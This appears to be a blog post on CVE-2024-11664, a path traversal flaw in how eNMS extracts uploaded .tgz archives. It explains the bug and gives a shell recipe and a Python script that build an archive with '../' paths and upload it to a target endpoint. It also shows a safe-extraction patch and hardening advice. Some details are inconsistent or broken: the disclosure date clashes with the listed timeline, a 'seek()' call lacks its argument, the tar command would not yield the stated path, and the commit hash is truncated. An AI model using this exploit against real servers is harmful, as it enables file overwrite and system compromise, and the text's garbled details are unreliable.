CVE-2024-11664 - Critical Path Traversal Vulnerability in eNMS (<=4.2) — How Attackers Can Exploit TGZ File Handling

On March 2024, a critical vulnerability known as CVE-2024-11664 was disclosed, affecting the eNMS (Enterprise Network Management System) application up to version 4.2. This vulnerability lurks inside the multiselect_filtering function in the eNMS/controller.py file, particularly within the handling of .tgz files. Exploiting this bug enables a remote attacker to perform path traversal, potentially overwriting or reading arbitrary files on the server, which can lead to full system compromise.

This exclusive post will walk you through how the vulnerability works, give you a sample exploit, and point you to official references and the security patch.

Vulnerability Breakdown

- Component: TGZ File Handler (multiselect_filtering in eNMS/controller.py)

Versions Affected: All up to eNMS 4.2 (inclusive)

- Impact: Path Traversal, leading to potential RCE/DoS/Data Theft
- Patch: 22bb443acca740fc83b5544165c1f53eff3f529

How Does the Vulnerability Work?

When eNMS receives .tgz archive files through its web interface, the multiselect_filtering function is responsible for processing and extracting its content. The vulnerable code does not properly sanitize file paths inside the .tgz archive.

A crafted .tgz file containing entries with path sequences like ../../../../etc/passwd can cause the extraction logic to overwrite or create files anywhere on the server’s filesystem, depending on the web server user's permissions.

Vulnerable Code Snippet

Below is a simplified version, representative of the vulnerable logic (prior to patch). Notice the lack of path validation:

# eNMS/controller.py (before the patch)
import tarfile

def multiselect_filtering(tgz_file):
    with tarfile.open(tgz_file) as tar:
        tar.extractall(path="/tmp/upload_dir")  # INSECURE

There is no check to prevent files like ../../../../etc/passwd inside the archive from being placed outside the intended directory.

Crafting the Exploit

An attacker can create a .tgz (tar+gzip) file with files possessing malicious pathnames. For example, to overwrite /tmp/hacked.txt on the server:

Crafting a Malicious Archive

mkdir evil
echo "hacked!" > evil/hacked.txt
tar -czvf payload.tgz -C evil ../tmp/hacked.txt

This will place a file named hacked.txt into /tmp/ when extracted without path validation.

Exploit Python Example

Below is a Python script that generates a malicious .tgz and uploads it via HTTP POST to a vulnerable eNMS instance.

import requests
import tarfile
import io

# Build malicious archive in memory
payload_stream = io.BytesIO()
with tarfile.open(fileobj=payload_stream, mode='w:gz') as tar:
    # Inject file to arbitrary path
    tarinfo = tarfile.TarInfo(name='../../../../tmp/hacked.txt')
    data = b'HACKED BY CVE-2024-11664\n'
    tarinfo.size = len(data)
    tar.addfile(tarinfo, io.BytesIO(data))

payload_stream.seek()

# Upload to vulnerable eNMS endpoint (URL format example)
url = 'http://target-enms.com/upload';
files = {'file': ('payload.tgz', payload_stream, 'application/gzip')}
response = requests.post(url, files=files)

print(f'Upload response: {response.status_code} {response.text}')

If the web application uses root (which is bad practice), attackers could even overwrite critical system files, resulting in a total system compromise.

Note: Live exploitation depends on specific application deployment and endpoint URLs.

Patch and Official Fix

The vulnerability was patched in commit 22bb443acca740fc83b5544165c1f53eff3f529. The patch introduces a path check that blocks files outside the intended extraction directory.

Patched Code Example

# eNMS/controller.py (after the patch)
def safe_extract(tar, path=".", members=None):
    import os

    for member in tar.getmembers():
        member_path = os.path.join(path, member.name)
        if not os.path.abspath(member_path).startswith(os.path.abspath(path)):
            raise Exception("Attempted Path Traversal in Tar File")

    tar.extractall(path=path, members=members)

def multiselect_filtering(tgz_file):
    with tarfile.open(tgz_file) as tar:
        safe_extract(tar, path="/tmp/upload_dir")  # SECURE

Recommendations

- Patch Now: Upgrade to eNMS 4.3 or later, or apply the official patch to affected deployments.

Audit File Uploads: Never trust archive file paths. Always validate extraction paths.

- System Permissions: Run web applications with the least privileges possible. Avoid running application servers as the root user.

References and Further Reading

- CVE-2024-11664 at NIST NVD
- eNMS GitHub Patch Commit
- eNMS Official Project Page
- OWASP Path Traversal Cheat Sheet

Conclusion

CVE-2024-11664 is a stark reminder of the dangers of blindly extracting user-supplied archives. If your network management tools, like eNMS, are not fully patched, you may be exposed to attacks that compromise your entire server. Patch now and review your code for secure handling of all file uploads.

Timeline

Published on: 11/25/2024 09:15:06 UTC
Last modified on: 12/04/2024 19:28:26 UTC